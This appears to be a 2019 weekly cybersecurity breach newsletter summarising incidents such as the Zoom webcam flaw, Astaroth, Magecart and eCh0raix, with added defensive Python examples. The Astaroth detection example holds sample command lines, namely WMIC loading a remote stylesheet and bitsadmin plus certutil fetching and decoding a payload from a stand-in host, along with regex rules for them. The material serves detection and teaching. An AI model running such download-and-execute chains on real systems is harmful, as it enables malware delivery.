Polyverse Weekly Breach Report


A snapshot of last week’s reported cybersecurity breaches and vulnerabilities

Zoom

A security researcher publicly disclosed a zero-day flaw that let any website a user visited force an Apple Mac with the Zoom video-conferencing app installed to join a meeting with its camera switched on. The hole was a local web server that the Zoom client quietly installed on the Mac to make joining calls a one-click affair; the server answered requests from any web page and stayed behind even after Zoom was uninstalled. The researcher reported the vulnerability to Zoom privately and gave it 90 days to fix the problem; when that deadline passed without a fix, he went public. The company now says it has patched the flaw; the researcher disagrees. To read more: https://www.theverge.com/2019/7/8/20687014/zoom-security-flaw-video-conference-websites-hijack-mac-cameras

Apple also pushed a silent macOS update that removes the local web server Zoom left behind, so it protects current and former Zoom users alike without requiring them to update or reinstall the app. To read more: https://techcrunch.com/2019/07/10/apple-silent-update-zoom-app/

Android apps

Researchers at the International Computer Science Institute in California found that some app developers use side channels and covert channels to harvest data the Android permission system should have withheld. They identified more than 1,300 Android apps that obtain precise location or persistent device identifiers even after the user has explicitly denied the relevant permission, for example by reading GPS coordinates out of the EXIF metadata of photos stored on the device, or by picking up identifiers that another app holding the permission had written to shared storage. To read more: https://thehackernews.com/2019/07/android-permission-bypass.html

Astaroth malware

Microsoft’s security team is warning users of an ongoing campaign distributing the Astaroth information-stealing trojan using only legitimate Windows tools. The campaign is a large spam run whose emails link to a website hosting a shortcut (LNK) file. If opened, the shortcut launches the Windows Management Instrumentation Command-line tool (WMIC) with its /format parameter pointed at a remote XSL stylesheet; the script in that stylesheet starts a chain of built-in utilities (BITSAdmin, Certutil and Regsvr32 among them) that downloads, decodes and eventually loads Astaroth into memory without writing a conventional executable to disk. To read more: https://www.zdnet.com/article/microsoft-warns-about-astaroth-malware-campaign/
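As an added example, not part of Microsoft's write-up or of this report, the Python below runs detection logic for the tell-tale command lines of that chain over a handful of constructed process-creation events in the shape of Sysmon Event ID 1 records. The sample events, the host example.invalid and the rule names are all made up for the illustration; the point is that the rules key on the abuse (a remote stylesheet, a download, a decode) rather than on the tool name, so ordinary administrative use of WMIC or certutil is not flagged.

```python
import re

# Constructed process-creation events (Image, CommandLine, ParentImage).
# These are made up for the example, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic.exe os get /format:"https://example.invalid/s.xsl"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic.exe os get caption /format:list",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high https://example.invalid/p.bin C:\Users\Public\p.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\p.bin C:\Users\Public\p.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# (rule name, executable basename, command-line pattern). WMIC is suspicious
# only when /format: points at an http(s) URL or a UNC path; bitsadmin when it
# is told to transfer from a URL; certutil when it decodes or fetches a file
# rather than doing certificate work.
RULES = [
    ("wmic_remote_xsl", "wmic.exe",
     re.compile(r'/format:\s*"?\s*(https?://|\\\\)', re.IGNORECASE)),
    ("bitsadmin_download", "bitsadmin.exe",
     re.compile(r"/transfer\b.*\bhttps?://", re.IGNORECASE)),
    ("certutil_decode_or_fetch", "certutil.exe",
     re.compile(r"\s-(decode|urlcache)\b", re.IGNORECASE)),
]


def classify(event):
    """Return the names of every rule the event matches (empty list if benign)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    return [name for name, exe, pattern in RULES
            if image == exe and pattern.search(cmdline)]


def scan(events):
    """Run every rule over a batch of events; returns (event index, rule name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]


def from_explorer(event):
    """True when the process was spawned by explorer.exe, which is what a
    double-clicked shortcut looks like; a WMIC child of explorer is a strong signal."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return parent == "explorer.exe"


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        note = " (parent explorer.exe)" if from_explorer(ev) else ""
        print(f"event {idx}: {rule}{note}: {ev['CommandLine']}")
```

In a real pipeline the same rules would sit in a SIEM or EDR query; correlating a hit on the WMIC rule with later bitsadmin and certutil hits on the same host within a few minutes is what turns three medium-confidence alerts into one high-confidence one.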

Croatia

A hacker group believed to be state-sponsored, and probably Russian, targeted Croatian government employees earlier this year. Victims received spear-phishing emails linking to look-alike copies of official websites, which served malware to the machines of anyone who visited. To read more: https://www.zdnet.com/article/croatian-government-targeted-by-mysterious-hackers/

Torrent sites

An ongoing campaign primarily affecting South Korea is spreading malware via torrent sites. The malware, disguised as Korean movies and TV shows, is a modified version of the GoBot2 backdoor, which enables attackers to connect a compromised computer to a botnet. To read more: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

WannaCry

TechCrunch has published an in-depth story on the “kill switch” that prevented a second WannaCry outbreak, and the two security researchers who stopped the malware from spreading. To read more: https://techcrunch.com/2019/07/08/the-wannacry-sinkhole/

NAS devices

New ransomware, tracked as eCh0raix, is targeting Network Attached Storage (NAS) devices made by QNAP Systems, a Taiwanese company. A NAS device is a dedicated file server that lets users store and share data and backups across multiple computers, which makes it a high-value target: encrypting it takes the backups with it. The ransomware gets onto QNAP devices by brute-forcing weak credentials and exploiting known vulnerabilities, so strong, unique passwords, current firmware and keeping the device off the public internet are the basic defences. To read more: https://thehackernews.com/2019/07/ransomware-nas-devices.html

FinSpy

Researchers detected a commercial surveillance spyware known as FinSpy targeting users in Myanmar. The spyware was created by Gamma International, a German company, and targets various mobile platforms and desktop operating systems. To read more: https://thehackernews.com/2019/07/finspy-spyware-android-ios.html

Marriott

The UK Information Commissioner’s Office announced its intention to fine this American hotel company £99m (about $123m) under Europe’s General Data Protection Regulation (GDPR) over a breach that began in 2014 in the guest-reservation database of Starwood, which Marriott acquired in 2016, and went undetected until 2018. The hackers had access to the personal details of roughly 339m guests. The notice came within a week of British Airways being told to expect a record £183m ($227m) GDPR fine. To read more: https://thehackernews.com/2019/07/marriott-data-breach-gdpr.html

Check out Have I Been Pwned (https://haveibeenpwned.com) to see whether any of your accounts have been exposed in these or earlier breaches.

Dell System Detect

A flaw in Dell System Detect, the support utility Dell’s website asks customers to install, let any website trigger the program to download and run arbitrary files with no user interaction. The utility listened on a local HTTP port for commands from Dell’s support site, and its check that a request really came from Dell was loose enough that an unrelated site could satisfy it. To read more: https://tomforb.es/dell-system-detect-rce-vulnerability/
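The Dell flaw and the Zoom item above share a pattern: a helper listening on localhost that trusts whatever a browser sends it. As an added example that is not from either vendor or from the researcher's write-up, the Python below puts the anti-pattern (a substring test on the Referer) beside a strict parse-and-compare on the Origin header. The allow-listed hostname and the sample headers are assumptions made for the illustration.

```python
from urllib.parse import urlsplit

# Hostnames the local service should accept: an exact set, not a substring.
# "www.dell.com" is used only to echo the item above; the check is generic.
ALLOWED_HOSTS = {"www.dell.com"}


def weak_referer_check(referer: str) -> bool:
    """The anti-pattern: accept any request whose Referer merely contains the
    vendor's name. 'https://dell.evil.example/' passes this test."""
    return "dell" in referer.lower()


def strict_origin_check(origin: str) -> bool:
    """Parse the Origin (or Referer) header properly and require an exact,
    case-insensitive hostname match over https. Missing or malformed headers
    are denied rather than tolerated."""
    if not origin:
        return False
    try:
        parts = urlsplit(origin)
        host = parts.hostname  # already lower-cased; may raise on malformed input
    except ValueError:
        return False
    if parts.scheme != "https" or not host:
        return False
    return host in ALLOWED_HOSTS


# Constructed headers a local HTTP service might see. Only the first should be
# allowed to drive a download-and-execute action.
CASES = [
    "https://www.dell.com/support/home",
    "https://dell.evil.example/lure",
    "https://www.dell.com.evil.example/",
    "https://evil.example/?q=dell",
    "http://www.dell.com/",
    "",
]


def evaluate(cases=CASES):
    """Return {header: (weak_result, strict_result)} for each sample header."""
    return {c: (weak_referer_check(c), strict_origin_check(c)) for c in cases}


if __name__ == "__main__":
    for header, (weak, strict) in evaluate().items():
        print(f"{header or '<no header>':45} weak={weak!s:5} strict={strict}")
```

Even the strict check only proves which site a browser was on; any page can still make the browser send a request to 127.0.0.1, so a localhost helper that can download and execute files needs a per-install secret or signed commands on top of the origin check, or, as Apple's Zoom clean-up shows, should not exist at all.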

Magecart

Researchers found a new supply-chain attack by so-called Magecart groups, which inject digital card skimmers into websites, that has touched 17,000 domains. Rather than breaking into each site, the attackers scan the internet for Amazon S3 buckets misconfigured to allow public write access, then append skimming code to every JavaScript file they find in them; any site that loads scripts from such a bucket serves the skimmer to its visitors. To read more: https://thehackernews.com/2019/07/magecart-amazon-s3-hacking.html
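As an added example, not from the researchers' report or from this newsletter, the Python below audits the two ways an S3 bucket ends up world-writable, the legacy bucket ACL and the bucket policy, using the data shapes that boto3's get_bucket_acl() and a parsed get_bucket_policy() document have, and then lists the JavaScript objects an injector would target. The ACLs, policy and object keys are constructed for the illustration; no AWS calls are made.

```python
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS, AUTH_USERS}   # AuthenticatedUsers means *any* AWS account
WRITE_PERMS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def public_write_grants(acl):
    """Return (group, permission) pairs that let the world add or overwrite
    objects, or rewrite the ACL itself. `acl` has the shape boto3's
    s3.get_bucket_acl() returns: {"Owner": ..., "Grants": [...]}."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if (grantee.get("Type") == "Group" and uri in PUBLIC_GROUPS
                and grant.get("Permission") in WRITE_PERMS):
            findings.append((uri.rsplit("/", 1)[-1], grant["Permission"]))
    return findings


def public_put_in_policy(policy):
    """Bucket policies can grant the same thing: flag Allow statements with a
    wildcard principal and an s3:PutObject / s3:* action. Returns their Sids."""
    hits = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        principal = st.get("Principal")
        wildcard = principal == "*" or (isinstance(principal, dict) and principal.get("AWS") == "*")
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if wildcard and any(a.lower() in ("s3:putobject", "s3:*", "*") for a in actions):
            hits.append(st.get("Sid", "<no Sid>"))
    return hits


def scripts_at_risk(acl, policy, keys):
    """If the bucket is world-writable by either route, list the JavaScript
    objects in it: those are the files a Magecart-style injector appends to."""
    if not public_write_grants(acl) and not public_put_in_policy(policy):
        return []
    return sorted(k for k in keys if k.lower().endswith(".js"))


# Constructed ACLs, policy and object listing, not real buckets.
OWNER = {"DisplayName": "shop-assets", "ID": "0" * 64}
SAFE_ACL = {"Owner": OWNER, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", **OWNER}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},   # public hosting is fine
]}
OPEN_ACL = {"Owner": OWNER, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", **OWNER}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},  # the misconfiguration
]}
AUTH_ACL = {"Owner": OWNER, "Grants": [
    {"Grantee": {"Type": "Group", "URI": AUTH_USERS}, "Permission": "FULL_CONTROL"},
]}
EMPTY_POLICY = {"Version": "2012-10-17", "Statement": []}
OPEN_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::shop-assets/*"},
    {"Sid": "AnyoneCanUpload", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:PutObject", "s3:PutObjectAcl"], "Resource": "arn:aws:s3:::shop-assets/*"},
]}
KEYS = ["js/checkout.js", "js/vendor/jquery.min.js", "css/site.css", "img/logo.png"]

if __name__ == "__main__":
    print("open ACL:", public_write_grants(OPEN_ACL))
    print("open policy:", public_put_in_policy(OPEN_POLICY))
    print("scripts at risk:", scripts_at_risk(OPEN_ACL, EMPTY_POLICY, KEYS))
```

Public READ on its own is how static hosting works and is not the problem here; WRITE is. Turning on S3 Block Public Access at the account level closes both routes at once, and Subresource Integrity on the script tags would stop a modified file from running even if a bucket were overwritten.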

Buhtrap

A hacking group known as Buhtrap was found exploiting a Windows zero-day, a local privilege-escalation flaw in the win32k component (CVE-2019-1132), in an attack on a government body; Microsoft fixed it in the July 2019 Patch Tuesday update. The flaw only affects older Windows versions such as Windows 7 and Windows Server 2008, since newer releases block the NULL-page mapping technique the exploit relies on. To read more: https://www.securityweek.com/buhtrap-group-used-windows-zero-day-government-attack

Agent Smith malware

New mobile malware dubbed Agent Smith has infected about 25m Android devices globally, including 15m in India. Delivered through third-party app stores disguised as a utility app, it exploits several known Android vulnerabilities to replace installed apps such as WhatsApp with repackaged versions whose APKs carry injected code that serves fraudulent ads. To read more: https://thehackernews.com/2019/07/whatsapp-android-malware.html

K12.com

The records of 7m students were exposed when a K12.com MongoDB database was left open on the internet without authentication. The exposed database contained information such as email addresses, names and genders. To read more: https://www.comparitech.com/blog/vpn-privacy/report-7-million-student-records-exposed-by-k12-com/

Pale Moon web browser

The team behind the Pale Moon web browser announced that its Windows archive server (not the main download site) was breached, and that hackers had installed a malware dropper in all archived installers of Pale Moon 27.6.2 and earlier. Anyone who installed from the archive server should treat the installer as untrusted and rescan the machine. To read more: https://www.bleepingcomputer.com/news/security/hackers-infect-pale-moon-archive-server-with-a-malware-dropper/

Canonical

The GitHub account of Canonical, the company behind Ubuntu, was hacked last weekend, but the Ubuntu Linux source code was not accessed, since it is hosted on Canonical’s own Launchpad rather than GitHub. The hacker created 11 new, empty GitHub repositories in the official Canonical account. To read more: https://www.zdnet.com/article/canonical-github-account-hacked-ubuntu-source-code-safe/

7-Eleven Japan

7-Eleven Japan shut down its 7pay mobile payment app after attackers used it to make about $506,000 in fraudulent purchases. The attackers took over customer accounts, helped by a password-reset flow that would send the reset link to any email address the requester supplied, and charged purchases to the payment cards linked to those accounts. To read more: https://www.mobilepaymentstoday.com/news/7-eleven-japan-suspends-mobile-app-after-data-breach/

Nemadji Research

A contractor with the Los Angeles County Department of Health Services is notifying patients about a phishing attack that exposed the personal information of 14,591 patients. The contractor, Nemadji Research, identifies and verifies patient eligibility for programs that reimburse for care provided by the department. To read more: https://www.smdp.com/citywide-notifications-underway-after-contractor-data-breach-exposes-dhs-patient-data/177282

American Hockey League app

The American Hockey League’s app malfunctioned this week, and started sending push notifications about a workplace dispute between two people. The league says that the problem is now fixed. To read more: https://www.vice.com/en_us/article/bj9ejz/a-sports-app-spammed-push-notifications-about-a-bizarre-violent-workplace-beef

Bitpoint

This Japan-based cryptocurrency exchange announced that it had lost $32m worth of cryptocurrency in a cyberattack on its hot wallets. The attackers stole Bitcoin, Bitcoin Cash, Litecoin, Ripple (XRP) and Ether. To read more: https://www.zdnet.com/article/bitpoint-cryptocurrency-exchange-hacked-for-32-million/

Zip bomb

A researcher has built a new kind of zip bomb: a 46 MB archive that expands to 4.5 PB when decompressed. Classic zip bombs rely on nested archives, which most scanners now refuse to recurse into; this one is a single layer that overlaps its file entries, so many entries in the archive’s central directory point at the same compressed bytes and each byte of the archive is decompressed many times over. Unpacking such a file can take down a system by exhausting CPU, RAM and disk space. To read more: https://www.vice.com/en_us/article/597vzx/the-most-clever-zip-bomb-ever-made-explodes-a-46mb-file-to-45-petabytes
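As an added example, not from the researcher's work or from this report, the Python below shows the two guards an extractor needs: a look at the central directory before anything is inflated, and a hard byte cap while inflating so that lying headers do not matter. The archives it checks are built in memory for the illustration, and the thresholds are arbitrary assumptions; the ratio is measured against the real archive size rather than the entries' declared compressed sizes, because in an overlapping-entry bomb many entries share the same compressed bytes and summing their compress_size fields would understate the blow-up.

```python
import io
import zipfile

MAX_TOTAL_BYTES = 100 * 1024 * 1024   # refuse archives declaring more than 100 MiB (assumed limit)
MAX_RATIO = 100                        # declared uncompressed bytes per byte of archive (assumed limit)


def check_archive(data: bytes):
    """Read only the central directory and decide whether to extract at all.
    Returns (ok, reason, declared_total, ratio)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        declared = sum(info.file_size for info in zf.infolist())
    ratio = declared / max(len(data), 1)   # real on-disk size as the denominator
    if declared > MAX_TOTAL_BYTES:
        return False, "declared size exceeds cap", declared, ratio
    if ratio > MAX_RATIO:
        return False, "compression ratio too high", declared, ratio
    return True, "ok", declared, ratio


def extract_member_capped(data: bytes, name: str, limit: int) -> bytes:
    """Stream one member and stop the moment more than `limit` bytes come out,
    whatever the headers claimed. Headers are attacker-controlled; the byte
    counter is not."""
    out = bytearray()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as src:
        while True:
            chunk = src.read(64 * 1024)
            if not chunk:
                break
            out.extend(chunk)
            if len(out) > limit:
                raise ValueError(f"{name}: exceeded {limit} bytes during extraction")
    return bytes(out)


def make_zip(members):
    """Build a deflate-compressed zip in memory from (name, payload) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members:
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed inputs: an ordinary text archive, and a 20 MiB run of zero bytes
# that deflate squeezes down to a few tens of KB, close to its 1032:1 ceiling.
BENIGN = make_zip([("notes.txt", "".join(f"line {i}\n" for i in range(500)).encode())])
ZERO_RUN = make_zip([("zeros.bin", b"\0" * (20 * 1024 * 1024))])

if __name__ == "__main__":
    for label, archive in (("benign", BENIGN), ("zero run", ZERO_RUN)):
        ok, reason, declared, ratio = check_archive(archive)
        print(f"{label}: {len(archive)} bytes on disk, declares {declared} bytes, "
              f"ratio {ratio:.0f}:1 -> {reason}")
```

The first guard is cheap and catches the headline case, since even the overlapping construction has to declare its 4.5 PB in the central directory for an unzipper to produce it; the second guard is what protects you when a crafted archive declares small sizes and inflates to something else, and it is the one to keep even if the first is tuned away for legitimate large archives.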

Train Manufacturer

A software engineer stole source code from a train manufacturer based in Chicago. He downloaded more than 3,000 electronic files that contained trade secrets and intellectual property, then fled to China. To read more: https://www.zdnet.com/article/engineer-flees-to-china-after-stealing-source-code-of-us-train-firm/

Vitagene

DNA-testing vendor Vitagene accidentally exposed 3,000 consumers’ personal information through a misconfigured database. To read more: https://healthitsecurity.com/news/dna-testing-service-vendor-reports-years-long-consumer-data-breach

Want to learn more?

Sign up below and receive these reports and more, directly in your inbox.

https://upscri.be/9816bc

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.